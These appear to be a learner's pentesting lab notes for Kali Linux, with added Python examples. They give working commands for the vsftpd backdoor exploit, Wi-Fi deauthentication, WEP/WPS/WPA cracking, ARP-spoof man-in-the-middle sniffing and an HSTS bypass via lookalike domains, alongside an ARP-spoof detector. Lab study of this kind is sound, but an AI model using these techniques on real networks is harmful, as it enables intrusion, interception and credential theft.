Kali Linux 2020 64-Bit

  • Required Downloads for VirtualBox
  • Password for Windows: “Passw0rd!”

http://old.kali.org/kali-images/kali-2018.4/
https://www.kali.org/downloads/
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Download Custom Kali


https://sourceforge.net/projects/metasploitable/files/

    • to become root please use this command:

    msfadmin@metasploitable:~$ sudo su -

    • to find the IP address of the machine use:

    root@metasploitable:~$ ifconfig

    • to shut down the machine use this command:

    root@metasploitable:~$ shutdown -h now

    • in Kali, to discover all the hosts (IPs) on the same network use this tool (it ARP-scans the given range):

    netdiscover -r 192.168.222.0/24

    • in Kali, to discover the open ports on a specific host use nmap; -oA writes the output in all three formats at once (normal .nmap, XML .xml and grepable .gnmap) under the base name “meta2”, -A enables version detection, OS detection and the default scripts, and -T5 is the “insane” timing template (fastest, but it can miss ports on a slow link; -T4 is the safer choice). The first command scans every port 0-65535, the second only nmap's default top 1000 ports:

    nmap -v -T5 -p 0-65535 -A 192.168.222.31 -oA meta2
    nmap -v -T4 -A 192.168.222.31 -oA meta2
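    • the grepable file that -oA produces (meta2.gnmap) is the one to feed into scripts; the parser below is an added example written for this page, not nmap's own code, and the scan lines in SAMPLE_GNMAP are constructed stand-ins rather than real output from the Metasploitable host:

```python
import re
from typing import Dict, List, NamedTuple


class PortEntry(NamedTuple):
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


# Constructed stand-in for the grepable file (meta2.gnmap) that -oA meta2 writes;
# it is not real scan output. The Apache line is included on purpose: its version
# string contains a "/" and breaks a naive split on that character.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Sat Apr 11 10:00:00 2020 as: nmap -v -T4 -A 192.168.222.31 -oA meta2
Host: 192.168.222.31 ()\tStatus: Up
Host: 192.168.222.31 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV/2)/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (996)
# Nmap done at Sat Apr 11 10:05:00 2020 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# "Host: <ip> (<name>)<TAB>Ports: <entries><TAB>Ignored State: ..."
_PORTS_LINE = re.compile(r"^Host: (\S+) \([^)]*\)\tPorts: ([^\t]*)")


def parse_gnmap(text: str) -> List[PortEntry]:
    """Parse the Ports: lines of an nmap .gnmap file into PortEntry records."""
    entries: List[PortEntry] = []
    for line in text.splitlines():
        match = _PORTS_LINE.match(line)
        if not match:
            continue  # comment line, "Status: Up" line, etc.
        host, ports_field = match.groups()
        for raw in ports_field.split(", "):
            # Each entry is port/state/proto/owner/service/rpcinfo/version/ with a
            # trailing "/"; only the version may itself contain "/", so split at most 6 times.
            fields = raw.split("/", 6)
            if len(fields) != 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields
            entries.append(PortEntry(host, int(port), proto, state, service, version.rstrip("/")))
    return entries


def open_ports(entries: List[PortEntry]) -> List[PortEntry]:
    return [e for e in entries if e.state == "open"]


def open_ports_by_host(entries: List[PortEntry]) -> Dict[str, List[int]]:
    """Host -> sorted list of open ports, handy for picking the next target (e.g. 21 -> ftp)."""
    out: Dict[str, List[int]] = {}
    for e in open_ports(entries):
        out.setdefault(e.host, []).append(e.port)
    return {h: sorted(p) for h, p in out.items()}


if __name__ == "__main__":
    for e in open_ports(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{e.host}:{e.port}/{e.proto} {e.service} {e.version}")
```

    • to run it against a real scan, read meta2.gnmap from disk and pass its contents to parse_gnmap; the filtered port 139 is kept in the parsed list but dropped by open_ports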

    • to be able to scan all the open ports you can also use the graphical tool: Zenmap
    • install an FTP client with this command:

    apt-get install ftp

    • connect to the target machine using this command:

    ftp 192.168.222.31

    • the banner in the response identifies the server as vsFTPd 2.3.4:
    • first try the username anonymous with any password
    • then try msfadmin:msfadmin
    • to list the commands available in the ftp client type “?”
    • to set the local directory (where downloaded files are saved) use the command “lcd”

    ftp> lcd /root/target/ftp1/
    Local directory now /root/target/ftp1

    • to terminate the ftp connection type “bye”
    • you can now start the Metasploit framework (msfconsole)
    • on this website you can find the module that exploits the backdoor in vsFTPd 2.3.4: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

    msf > use exploit/unix/ftp/vsftpd_234_backdoor
    msf > set RHOSTS 192.168.222.31
    msf > run

    • install Nessus on Kali (after downloading the .deb package from Tenable):

    root@kali:/home/mateo/Downloads# dpkg -i Nessus-8.10.0-debian6_amd64.deb

    • list of all the Linux commands:

    https://www.mediacollege.com/linux/command/linux-command.html

    • install terminator

    apt-get update
    apt-get install terminator

    • change the MAC address of the wireless card (the interface has to be down while the hardware address is set):

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up
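    • what makes a spoofed address safe to use: the first octet carries two flag bits, and 00:11:22:33:44:55 as used above has both of them clear, i.e. it is a globally administered (vendor-assigned) address. The Python helper below is an added example for this page, not part of ifconfig or of the original notes; all function names are made up here:

```python
import os


def parse_mac(mac: str) -> bytes:
    """Accept aa:bb:cc:dd:ee:ff or aa-bb-cc-dd-ee-ff; raise on anything else."""
    octets = mac.strip().lower().replace("-", ":").split(":")
    if len(octets) != 6 or not all(len(o) == 2 for o in octets):
        raise ValueError(f"malformed MAC: {mac!r}")
    return bytes(int(o, 16) for o in octets)


def format_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def classify(mac: str) -> dict:
    """The two flag bits live in the first octet:
    bit 0 = I/G (set: multicast), bit 1 = U/L (set: locally administered)."""
    first = parse_mac(mac)[0]
    return {
        "multicast": bool(first & 0x01),
        "locally_administered": bool(first & 0x02),
    }


def as_spoof_mac(mac: str) -> str:
    """Return mac with I/G cleared (a multicast source address is invalid on the wire)
    and U/L set (locally administered, so it cannot collide with a vendor OUI)."""
    raw = bytearray(parse_mac(mac))
    raw[0] = (raw[0] & ~0x01) | 0x02
    return format_mac(bytes(raw))


def random_spoof_mac(entropy: bytes = None) -> str:
    """Six random bytes with the flag bits fixed; pass entropy for a reproducible result."""
    raw = entropy if entropy is not None else os.urandom(6)
    return as_spoof_mac(format_mac(raw[:6]))


if __name__ == "__main__":
    print(as_spoof_mac("00:11:22:33:44:55"), random_spoof_mac())
```

    • the value returned by as_spoof_mac or random_spoof_mac is what goes after “hw ether”; keep the vendor-style address only if you deliberately want to look like a specific device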

    • Change the state of the wireless card from Managed mode to Monitor mode:

    ifconfig wlan0 down
    airmon-ng check kill
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up

    • once in monitor mode you can scan for the networks around you; by default only the 2.4 GHz band is scanned. The commands below call the monitor interface mon0: with the iwconfig method above the interface keeps its name (wlan0), while airmon-ng start wlan0 creates mon0 on older versions and wlan0mon on current ones, so substitute the name your system shows

    airodump-ng mon0

    • to sniff the 5 GHz band you can use the “--band” argument

    airodump-ng --band a mon0

    • to sniff multiple bands (2.4 and 5 GHz) at the same time use the argument “--band abg”

    airodump-ng --band abg mon0

    • to listen and capture a specific Access Point BSSID traffic in order to list all the connected stations you can use:

    airodump-ng --bssid 00:11:22:33:44:55 --channel 2 --write test mon0

    • Deauthentication attack: disconnect a client from a network using the tool aireplay-ng (omit -c to deauthenticate every client of the AP; a count of 0 sends deauth frames until stopped)
    • In this example the client is 00:11:11:11:11:11 and the router (AP) is 00:22:22:22:22:22

    aireplay-ng --deauth [#DeauthPackets] -a [Network MAC] -c [TargetMAC] [InterfaceName]
    aireplay-ng --deauth 99999999 -a 00:22:22:22:22:22 -c 00:11:11:11:11:11 mon0

    • analyze the captured IVs (initialization vectors, only 24 bits long, so they repeat on a busy network) and crack the WEP (Wired Equivalent Privacy) key using aircrack-ng

    aircrack-ng test-01.cap

      • if the network is not busy we need to force the AP to generate new IVs; first we need to associate with the AP (fake authentication, a delay of 0 means authenticate once)

      aireplay-ng --fakeauth 0 -a [MAC of the AP] -h [MAC of the Kali host] mon0
      aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h 00:22:22:22:22:22 mon0

    • force the AP to generate new IVs now that we are associated with the AP

    aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 00:22:22:22:22:22 mon0

    • WPA encryption uses the TKIP cipher and WPA2 encryption uses the CCMP (AES) cipher
    • in the commands below 11 is the AP, 22 is the Kali wifi interface in monitor mode and 33 is the client connected to the AP
    • to scan for routers that have the WPS feature enabled use the command “wash”
    • use the reaver tool to brute force the PIN of the WPS feature
    • if the packaged reaver tool fails, you can use this older version (make the downloaded binary executable first); --no-associate tells reaver not to associate itself, so keep a separate fakeauth running in another terminal:

    wash --interface mon0
    chmod +x reaver
    ./reaver --bssid 00:11:11:11:11:11 --channel 6 --interface mon0 -vvv --no-associate
    aireplay-ng --fakeauth 30 -a 00:11:11:11:11:11 -h 00:22:22:22:22:22 mon0
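    • why the WPS PIN can be brute forced online at all: the PIN is seven digits plus a checksum digit, and the registrar confirms the first four digits separately from the last three, which is what reaver exploits. The following is an added Python example written for this page (not reaver's code); the function names are assumptions of the example, the checksum algorithm is the one from the WPS specification:

```python
from typing import Iterator


def wps_checksum(first_seven: int) -> int:
    """Checksum digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven digits, mod 10."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def search_space() -> int:
    """Worst-case number of online attempts.
    The AP answers the first half (digits 1-4) with its own NACK before the second
    half is even checked, and digit 8 is a checksum, so the two halves are guessed
    independently: 10**4 + 10**3 instead of 10**7."""
    first_half = 10 ** 4
    second_half = 10 ** 3
    return first_half + second_half


def second_half_candidates(first_half: int) -> Iterator[str]:
    """The 1000 complete PINs left to try once the first half has been confirmed."""
    for rest in range(1000):
        first_seven = first_half * 1000 + rest
        yield f"{first_seven:07d}{wps_checksum(first_seven)}"


if __name__ == "__main__":
    print(search_space(), is_valid_pin("12345670"), next(second_half_candidates(1234)))
```

    • is_valid_pin is also a quick sanity check on a PIN printed on a router label or found in reaver's output: a PIN that fails the checksum was mistyped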

    • if the attack on the WPS feature does not work, we need to capture a handshake: listen on the AP's channel and write to a file, then deauthenticate a connected client so that it reconnects while airodump-ng is recording:

    airodump-ng --bssid 00:11:11:11:11:11 --channel 2 --write handshake mon0
    aireplay-ng --deauth 4 -a 00:11:11:11:11:11 -c 00:33:33:33:33:33 mon0

    • to create a wordlist use the crunch tool (with -t the min and max length must both equal the length of the pattern; each @ is replaced by every character of the charset, the other characters stay fixed). Note that a WPA/WPA2 passphrase is at least 8 characters long, so a pattern shorter than 8 can never contain the key:

    crunch [min] [max] [characters] -t [pattern] -o [filename]
    crunch 6 6 abcd123% -t a@@@@b -o wordlist.txt
    aircrack-ng handshake-01.cap -w wordlist.txt
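    • what aircrack-ng -w does with the handshake file, as an added Python example written for this page (not aircrack-ng's or crunch's code): derive the PMK, the PTK and the message-2 MIC for each candidate passphrase and compare it with the captured MIC. The handshake is constructed inside build_handshake instead of being parsed from a .cap file, the MACs follow the convention above (11 = AP, 33 = client), and the SSID, passphrase and nonces are made up; the PMK test vector (“password” / “IEEE”) is the one from the 802.11i standard. crunch_pattern reproduces the -t placeholder semantics of crunch so that a WPA-length pattern can be tried:

```python
import hashlib
import hmac
import itertools
from typing import Any, Dict, Iterable, Iterator, Optional


def pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the slow step that aircrack-ng repeats once per wordlist entry."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1(PMK, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = b"".join(
        hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return blocks[:64]


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes.
    WPA/TKIP uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def crack(hs: Dict[str, Any], candidates: Iterable[str]) -> Optional[str]:
    """Offline check of each candidate against the captured message-2 MIC, as aircrack-ng -w does."""
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            continue  # WPA passphrases are 8-63 characters: skip instead of wasting a PBKDF2 run
        kck = ptk(pmk(cand, hs["ssid"]), hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return cand
    return None


def crunch_pattern(pattern: str, charset: str) -> Iterator[str]:
    """crunch-style -t pattern: every '@' takes each charset character, other characters stay literal."""
    slots = [i for i, c in enumerate(pattern) if c == "@"]
    for combo in itertools.product(charset, repeat=len(slots)):
        chars = list(pattern)
        for i, ch in zip(slots, combo):
            chars[i] = ch
        yield "".join(chars)


def build_handshake(passphrase: str, ssid: str, seed: bytes = b"lab") -> Dict[str, Any]:
    """Constructed handshake for the example, not a real capture: a message-2 EAPOL-Key
    frame with a zeroed MIC field, nonces derived from seed, and the MIC that the real
    passphrase produces. MACs follow the page's convention (11 = AP, 33 = client)."""
    ap_mac = bytes.fromhex("001111111111")
    sta_mac = bytes.fromhex("003333333333")
    anonce = hashlib.sha256(seed + b"anonce").digest()
    snonce = hashlib.sha256(seed + b"snonce").digest()
    # 802.1X header, descriptor type, key info, key length, replay counter, SNonce,
    # key IV, RSC, key ID, MIC (zeroed), key data length
    eapol = (bytes.fromhex("0103005f02010a0000") + b"\x00" * 8 + snonce
             + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    kck = ptk(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    hs = build_handshake("passw0rd", "lab-ap")
    print(crack(hs, crunch_pattern("pass@@@d", "w0r")))
```

    • the cost is entirely in pmk(): 4096 PBKDF2 rounds per candidate, which is why a big wordlist calls for a GPU (see below) and why a pattern with 7^4 placeholders already means thousands of derivations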

    • if the wordlist is too big or the CPU power is not enough you can use services like:

    https://gpuhash.me/

    • to map the network you can also use the tool “netdiscover”

    netdiscover -r 192.168.222.1/24

    • default username and password on a jailbroken iOS device (SSH as root):

    root | alpine

    • use arpspoof to redirect traffic (man-in-the-middle attack); enable IP forwarding first, otherwise the victim's traffic is dropped on the Kali host instead of being relayed. Here 10.0.2.7 is the victim and 10.0.2.1 the gateway, and both directions are poisoned:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 10.0.2.7 10.0.2.1
    arpspoof -i eth0 -t 10.0.2.1 10.0.2.7
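    • what arpspoof actually puts on the wire, and how a defender spots it, as an added Python example for this page (not arpspoof's or bettercap's code): build_arp_reply produces the unsolicited ARP reply that each of the two commands keeps sending, parse_arp decodes it, and detect_arp_spoofing flags the resulting IP-to-MAC changes. The MAC addresses and frames are constructed for the example; the IPs are the ones from the commands above:

```python
import struct
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


class Arp(NamedTuple):
    opcode: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP reply that says "sender_ip is at sender_mac".
    arpspoof -t <target> <host> repeats this with sender_mac = attacker, sender_ip = host."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> Arp:
    """Decode an Ethernet/ARP frame for IPv4 over Ethernet; reject anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    body = frame[22:42]
    return Arp(opcode, mac_str(body[0:6]), ip_str(body[6:10]), mac_str(body[10:16]), ip_str(body[16:20]))


def detect_arp_spoofing(frames: List[bytes], known: Dict[str, str]) -> List[str]:
    """Defender's view: flag a reply that moves a known IP to a new MAC, and a MAC that
    answers for more than one IP (the signature of a full-duplex man in the middle)."""
    alerts: List[str] = []
    table = dict(known)
    ips_per_mac: Dict[str, Set[str]] = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        if arp.opcode != ARP_REPLY:
            continue
        previous = table.get(arp.sender_ip)
        if previous is not None and previous != arp.sender_mac:
            alerts.append(f"{arp.sender_ip} moved from {previous} to {arp.sender_mac}")
        table[arp.sender_ip] = arp.sender_mac
        ips_per_mac[arp.sender_mac].add(arp.sender_ip)
    for mac in sorted(ips_per_mac):
        if len(ips_per_mac[mac]) > 1:
            alerts.append(f"{mac} claims {sorted(ips_per_mac[mac])}")
    return alerts


# Constructed sample mirroring the two arpspoof commands above (not a real capture).
ATTACKER_MAC, GATEWAY_MAC, VICTIM_MAC = "00:aa:aa:aa:aa:aa", "52:54:00:12:35:00", "08:00:27:11:22:33"
SPOOF_FRAMES = [
    build_arp_reply(ATTACKER_MAC, "10.0.2.1", VICTIM_MAC, "10.0.2.7"),   # to the victim: "the gateway is me"
    build_arp_reply(ATTACKER_MAC, "10.0.2.7", GATEWAY_MAC, "10.0.2.1"),  # to the gateway: "the victim is me"
]

if __name__ == "__main__":
    print(detect_arp_spoofing(SPOOF_FRAMES, {"10.0.2.1": GATEWAY_MAC}))
```

    • the second alert fires even without a known table, which is why poisoning both directions (as above, or arp.spoof.fullduplex in bettercap) is easier to detect than poisoning the victim alone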

    • to run bettercap (a more capable replacement for arpspoof) use:

    bettercap -iface eth0

    • to enable modules in bettercap:

    net.probe on
    net.show
    help arp.spoof
    set arp.spoof.fullduplex true
    set arp.spoof.targets 10.0.2.7
    arp.spoof on
    net.sniff on
    exit

    • to use a caplet, create a text file with all the commands above inside, name it spoof.cap and run bettercap pointing to the caplet:

    bettercap -iface eth0 -caplet /root/spoof.cap

    • tests to be done against this http web address:

    http://vulnweb.com/

    • HTTPS is HTTP encrypted with TLS (Transport Layer Security), the successor of SSL (Secure Sockets Layer)
    • Downgrade HTTPS connections to HTTP using this caplet, which is to be copied to the default caplet location /usr/share/bettercap/caplets
    • here is a copy of the spoof.cap that was used in the example above
    • to display all the available caplets type:

    caplets.show

    • sites like Facebook or Twitter use HSTS (HTTP Strict Transport Security), so the browser refuses to load them over plain HTTP
    • to get around that protection we need to feed the browser a similar-looking domain name that has no HSTS policy, like facebook.corn or twiter.com
    • Download bettercap from here
    • Fix HSTS Hijack caplet dial tcp error
    • to start the webserver in Kali:

    service apache2 start

    • default web root directory of the webserver is:

    /var/www/html